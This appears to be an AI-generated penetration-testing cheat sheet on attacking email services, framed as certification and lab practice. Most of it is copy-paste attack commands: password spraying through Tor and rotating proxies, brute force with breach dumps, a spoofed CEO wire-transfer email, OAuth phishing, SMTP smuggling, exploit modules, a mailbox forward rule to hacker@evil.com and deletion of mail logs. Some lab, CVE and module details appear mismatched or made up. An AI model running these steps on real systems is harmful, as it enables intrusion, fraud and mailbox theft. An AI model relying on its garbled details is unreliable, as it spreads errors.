SMTP

Learning Objectives

• Master email protocols (SMTP, IMAP, POP3) as vectors for enumeration, credential theft, spoofing, and pivoting to internal networks.

• Identify misconfigurations in on-prem (Exim/Postfix) vs. cloud (O365/GWS) deployments.

• Execute attacks with evasion (e.g., proxy chaining for brute-force) and articulate mitigations (e.g., SPF/DMARC hardening).

• New: Analyse email metadata for forensics and simulate phishing chains in reports.

Attack Surface Overview

# Common Vectors (Enhanced)
- Misconfigurations (open relay, anonymous VRFY/EXPN, weak TLS)
- User enumeration (VRFY/RCPT, cloud API leaks)
- Password attacks (brute-force, spraying, credential stuffing from breaches)
- Protocol exploits (SMTP smuggling, STARTTLS downgrade)
- Vulnerabilities (RCE in proxies, auth bypass in plugins)
- Spoofing/phishing (bypassing SPF/DKIM/DMARC)
- **New:** OAuth misconfigs (token replay in O365/GWS)
- **New:** Metadata exfil (e.g., via IMAP searches for PII)
- **New:** Supply-chain (vulnerable plugins like Post SMTP in WordPress)

Enumeration (Stealth → Aggressive)

Prioritise passive DNS recon to avoid direct probes. Use timing delays (--max-rate 50) for IDS evasion.

# 1. Passive DNS Recon (MX/A/TXT for SPF/DKIM/DMARC)
dig mx <domain> +short  # MX records
dig a <mail.example.com> +short  # A records
dig txt <domain> | grep -E "spf|dkim|dmarc"  # Auth records
# Amass for subdomains/emails: 
amass enum -d <domain> -o amass.txt
# Tools: 
MXToolbox.com (web), DNSdumpster.com (visual map)

# 2. Email Harvesting
theHarvester -d <domain> -b all -f harvest.html  # Emails, hosts from multiple sources
# Holehe for disposable email checks: 
holehe --only-email user@domain.com

# 3. Service Discovery (Nmap with Scripts)
nmap -Pn -sV -sC -p25,110,143,465,587,993,995 --script=banner,ssl-enum-ciphers <IP> -T2  # Stealthy, check TLS
# Masscan for ranges: 
masscan -p25,587 10.10.10.0/24 --rate=500 --open-only
# IMAP/POP3 Scripts: 
nmap -p143,993 --script=imap-capabilities,pop3-ntlm-info <IP>

# 4. Exposed Services Scan
shodan search "port:25 smtp" --fields ip_str,port,org  # Public mail servers
# Censys: 
censys search "services.port:25 and services.protocol:SMTP" --fields host,autonomous_system.organization

Instructions: Log all outputs (-oN enum.txt). Start passive (Amass/TheHarvester) for 80% intel without alerts. Cross-reference with Shodan for version fingerprinting (e.g., "Exim 4.97").

Report: "MX: mail.example.com → Exposed on 25/TCP → Risk: Open relay potential."

Authentication & Misconfigurations

Test for legacy auth (e.g., plain-text POP3). Document weak TLS (e.g., SSLv3 support).

# SMTP User Enum (Manual + Tool)
telnet <IP> 25
VRFY user@domain.com  # Verbose response = exists
EXPN mailinglist@domain.com  # Expands lists
RCPT TO: <user@domain.com>  # 250 OK = valid
# Tool: 
smtp-user-enum -M VRFY,EXPN,RCPT -U users.txt -t <IP> -v

# **New:** POP3/IMAP Enum
telnet <IP> 110  # POP3
USER testuser
# If no error, valid. For IMAP: 
openssl s_client -connect <IP>:993 -quiet; a1 LOGIN user pass
# Tool: 
hydra -L users.txt -p test <IP> pop3  # Quick validity check

# **New:** TLS Downgrade Test
nmap -p465,587 --script ssl-enum-ciphers <IP>  # Weak ciphers?
testssl.sh <IP>:587  # Full TLS audit (install via apt)

# Common Weak Configs
- Anonymous relay: swaks --to external@other.com -server <IP>
- No STARTTLS enforcement: telnet <IP> 587; EHLO test
- IMAP: Unencrypted 143/TCP open (sniff creds with Wireshark)
- Default creds (postmaster/no-pass) or null binds (POP3: USER '')

Instructions: Use swaks for safe relay tests: swaks --server <IP> --from test@domain --to victim@domain --body "Test". If the relay works, note bounce addresses. For reporting: "Misconfig: VRFY enabled → Enum 50 users → Impact: Targeted phishing."

Cloud Enumeration & Attacks

Focus on API abuse; use proxies to evade lockouts.

# Office 365 (O365)
o365spray.py --validate --domain <domain>  # Check domain validity
o365spray.py --enum -U users.txt --domain <domain> --proxy socks5://127.0.0.1:9050  # Tor evasion
# AADInternals for tenant recon: 
Get-AADIntTenantDetail -Domain <domain>
# OAuth Abuse: 
Register rogue app via Azure portal sim (lab), replay tokens with curl

# Google Workspace (GWS)
enum_google.py --domain <domain>  # User enum via APIs
# GSuite Enumeration: 
gsuite-enum -d <domain> -u users.txt
# Phishing Sim: 
Use Evilginx2 for OAuth phish: evilginx2 -p ./phishlets/gws.letsencrypt

# Common Cloud Weaknesses
- Weak MFA bypass (e.g., legacy auth in O365)
- Over-permissive apps (GWS: Check via admin console sim)
- Bulk sender non-compliance (Gmail 2025 rules: No DMARC → Blocks)

Instructions: Limit to 1 req/sec in scripts (--delay 1). Test in lab O365 tenant (free trial). Report: "Cloud Enum: 20 valid users via o365spray → Spray weak passes → High impact (domain-wide compromise)."

Password Attacks

Incorporate spraying (same pass, many users) over brute-force to evade detection.

# On-Prem (Hydra/Medusa)
hydra -L users.txt -P rockyou.txt -t 4 <IP> smtp -s 587  # Thread limit, STARTTLS
# Medusa: 
medusa -h <IP> -U users.txt -P passes.txt -M smtp -m DIR:/dev/null

# Cloud Spraying
o365spray.py --spray -U users.txt -p Summer2025! --count 2 --lockout 300 --domain <domain>  # 2 attempts, 5min wait
# MailSniper (PowerShell): 
Import-Module MailSniper.ps1; Invoke-SprayMailbox -Usernames users.txt -Password P@ssw0rd -Domain <domain>
# CrackMapExec for hybrid: 
cme smb <DC> -u users.txt -p pass --gen-relay-list relays.txt  # If AD-integrated mail

# Credential Stuffing
crowbar -s smtp/25 -S <IP> -u users.txt -c breaches.txt -r 10 -t 5  # From HaveIBeenPwned dumps

Instructions: Rotate proxies/VPNs every 50 attempts. Monitor for lockouts (e.g., 429 errors). Use SecLists wordlists tailored to seasons (e.g., "Password2025"). Report: "Spray: 5% success rate → Access to admin@ → Pivots to SharePoint."

Protocol-Specific Attacks

A. SMTP (Enhanced with Smuggling)

# Open Relay Test
nmap -p25 --script smtp-open-relay <IP>
swaks -tls --server <IP> --from external@other.com --to internal@domain.com -body "Relay test"
# SMTP Smuggling (CVE-2024-27305): 
swaks --server <IP> --body $'\r\n.\r\nDATA\r\nRCPT TO: <victim>\r\nDATA\r\n.\r\n'  # Double CR/LF bypass

# Spoofing (Bypass Auth Checks)
telnet <IP> 25
HELO spoof.com
MAIL FROM:<ceo@domain.com>
RCPT TO:<victim@domain.com>
DATA
Subject: Urgent Wire
Pay $10k now.
.
QUIT
# Automated: 
python3 smtp_spoof.py <IP> <from> <to> <msg>

# STARTTLS Downgrade
openssl s_client -connect <IP>:587 -starttls smtp -crlf -msg  # Force downgrade if weak

B. POP3/IMAP (New Section)

# Connect & Enum
telnet <IP> 110  # POP3
USER admin; PASS pass123  # If success: +OK
# IMAP: 
openssl s_client -connect <IP>:993; a LOGIN user pass; b LIST "" "*"
# Mailbox Dump: 
imapfilter -h <IP> -u user -p pass -P 993 script.lua  # Lua for searches

# Attacks: Sniffing (MITM with sslstrip), or priv esc via weak storage (e.g., /var/mail readable)
# IMAP Folder Manipulation: 
a CREATE "Inbox/Phish"; a APPEND "Inbox/Phish" (\Seen) "{100} Phishing payload"

Instructions: For smuggling, validate with Wireshark (look for split commands). Clean up test mails post-attack. Evasion: Encode subjects in Base64. Report: "Spoof via open relay → Delivered phishing → Medium impact (social engineering vector)."

Latest CVEs (2024–2025) (Updated)

On-Prem Servers:
- CVE-2024-27938: Postal SMTP Smuggling (spoofing via malformed commands).<grok-card data-id="24944f" data-type="citation_card"></grok-card> └ PoC: Double CRLF in DATA; Affects <3.0.0.
- CVE-2024-39929: Exim file extension bypass (deliver exes via mail).<grok-card data-id="e1353c" data-type="citation_card"></grok-card> └ Metasploit: auxiliary/dos/exim/file_bypass; Scan: Shodan "Exim 4.97".
- CVE-2025-26794: Exim SQLi via SQLite hints (RCE potential).<grok-card data-id="bf378c" data-type="citation_card"></grok-card> └ Exploit: Injected queries in ETRN; Patch to 4.98.1.
- CVE-2025-30232: Exim use-after-free (DoS/RCE).<grok-card data-id="79fd47" data-type="citation_card"></grok-card> └ Trigger with malformed headers; Reported March 2025.
- CVE-2025-7624: Sophos Firewall SMTP proxy SQLi to RCE.<grok-card data-id="dcbc16" data-type="citation_card"></grok-card> └ If quarantining enabled; PoC on GitHub.

Cloud:
- CVE-2025-32711: M365 "EchoLeak" zero-click AI vuln (email metadata leak).<grok-card data-id="d5dfa6" data-type="citation_card"></grok-card> └ Affects Outlook; CISA KEV.
- ED 25-02: Exchange Server auth bypass (O365 hybrid).<grok-card data-id="74f8a9" data-type="citation_card"></grok-card> └ Mitigate by Dec 2025; ProxyLogon successor.
- GWS OAuth Bypass: 2024 email auth flaw (account takeover).<grok-card data-id="1d82d4" data-type="citation_card"></grok-card> └ Replay tokens; 2025 phishing surge via apps.<grok-card data-id="cf5757" data-type="citation_card"></grok-card>

WordPress/Plugins:
- CVE-2025-24000: Post SMTP auth bypass (site takeover).<grok-card data-id="bdade5" data-type="citation_card"></grok-card> └ Affects 400k+ installs; CVSS 8.8.

# Scan with Nuclei
nuclei -u <IP> -t cves/2024/CVE-2024-39929.yaml -t cves/2025/CVE-2025-26794.yaml -severity high,critical
# Metasploit: 
use exploit/multi/smtp/exim_sql_injection; 
set RHOST <IP>; 
run

Instructions: Replicate in Docker (e.g., a vulnerable Exim image). Read NVD for each; note CVSS/impact. Include in reports: "CVE-2025-26794 unpatched → SQLi → RCE → Critical (full server access). Patch: Upgrade Exim."

Post-Exploitation & Persistence

# Exfil Data (IMAP Search)
curl -u user:pass imaps://<IP> -X 'SEARCH ALL'  # List mails; FETCH for content
# Mailbox Rules (O365): 
Set-MailboxFolderPermission -Identity user:\Inbox -User hacker -AccessRights Owner
# PowerShell: 
New-InboxRule -Name Backdoor -RedirectTo hacker@evil.com  # Persistence via auto-forward

# Phishing Persistence: 
Embed beacons in sigs; monitor via rules
# Cleanup: 
Delete test mails; rm /var/log/maillog entries if root

Instructions: For persistence, test forwarding loops in the lab. Exfil to Burp for analysis. Report: "Post-Exploit: Added forward rule → Ongoing exfil → Mitigation: Audit rules quarterly."

Key Commands Summary (Copy-Paste Ready)

# Enum
dig mx <domain>; theHarvester -d <domain> -b all
nmap -p25,587 --script smtp-open-relay <IP>

# Auth/Misconfig
smtp-user-enum -M VRFY -U users.txt -t <IP>
swaks --server <IP> --from spoof@domain --to victim@domain

# Attacks
hydra -L users.txt -P rockyou.txt <IP> smtp -s 587
o365spray.py --spray -U users.txt -p pass --domain <domain>

# Cloud
Get-AADIntTenantDetail -Domain <domain>
gsuite-enum -d <domain> -u users.txt

# CVE Test
nuclei -u <IP> -t cves/2025/CVE-2025-26794.yaml

---

Prep & Practice Plan

Defensive Awareness (New): After labs, simulate blue-team (e.g., Snort rules for SMTP smuggling). Review RFC 5321 for protocol quirks.

Weekly Schedule (4-Week Cycle):
[ ] Mon: 30 min theory/CVEs + 60 min passive enum
[ ] Tue-Thu: 120 min attacks (rotate on-prem/cloud)
[ ] Fri: 45 min spraying/evasion + 30 min IMAP/POP3
[ ] Sat: 90 min full chain (enum → spoof → exfil) + report
[ ] Sun: Review, mock Q&A (e.g., "Mitigate SMTP smuggling")

Daily Checklist:
[ ] 30 min: Theory + CVEs (NVD/Exploit-DB)
[ ] 90 min: Lab (screenshots/steps)
[ ] 30 min: Report snippet (finding → exploit → impact → mit)
[ ] **New:** 15 min: Quiz (e.g., "Bypass DMARC on this spoof")

Labs (Expanded):
- Metasploitable 2 (SMTP relay) – VulnHub
- HackTheBox: "Mailroom" (Exim RCE), "Sauna" (O365)
- TryHackMe: "Email Basics", "SMTP Enumeration"
- **New:** OverTheWire: Natas (web-mail SQLi chain)
- **New:** VulnHub: "Devel" (Postfix misconfigs)
- **New:** Custom: Docker mailcow + vulnerable Exim/Postfix images
- **New:** Proving Grounds: "Email-Hack" for timed phishing

Mock Exams:
- 2-hour sim: Target lab domain, output 5-page report with CVEs.
- Resources: eJPT modules, "Hacking Exposed: Web Apps" Ch. 12.